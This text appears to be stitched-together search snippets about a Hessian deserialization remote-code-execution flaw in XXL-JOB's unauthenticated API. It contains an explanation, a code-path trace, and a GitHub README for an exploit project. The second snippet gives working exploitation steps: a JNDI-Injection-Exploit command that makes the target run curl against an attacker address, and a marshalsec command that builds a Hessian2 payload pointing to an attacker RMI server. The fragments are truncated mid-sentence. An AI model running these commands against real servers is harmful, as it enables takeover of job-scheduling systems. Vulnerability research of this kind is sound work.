当xxl-job 的 API 接口存在未授权访问问题时,恶意用户可以通过构造特殊的请求来触发 Hessian 反序列化漏洞。具体来说,恶意用户可能会发送一个包含恶意对象的 Hessian 序列化数据给 xxl-job 服务器,服务器在反序列化这个数据时,就会执行恶意对象中的代码,从而导致安全漏洞。 4. 提供解决方案来修复xxl-job api接口的...
XXL-JOB 2.0.2 1.开启RMI服务 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "curl [Address]:5555" 使用最后一个。 2.生成Payload java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian2 SpringAbstractBeanFactoryPointcutAdvisor rmi://[RMI Address]:1099/stbjir >...
直接单步跟进com.xxl.job.admin.core.schedule.XxlJobDynamicScheduler.invokeAdminService=>com.xxl.rpc.remoting.net.impl.servlet.server.ServletServerHandler.handle方法中,调用parseRequest处理request对象 继续跟进,调用readBytes读取请求中的数据,最终是调用Hessian2反序列化requestBytes. JNDI Bypass 参考:https://www...
Repository files navigation README XxlJob-Hessian-RCE 此漏洞为Xxljob配置不当情况下反序列化RCE XxlJob<=2.1.2,需要利用Hessian触发。 XxlJob >= 2.2.0 会支持RESTFUL API,直接打公开的POC过去即可。 该项目主要是探讨Hessian触发方式。 Packages No packages published...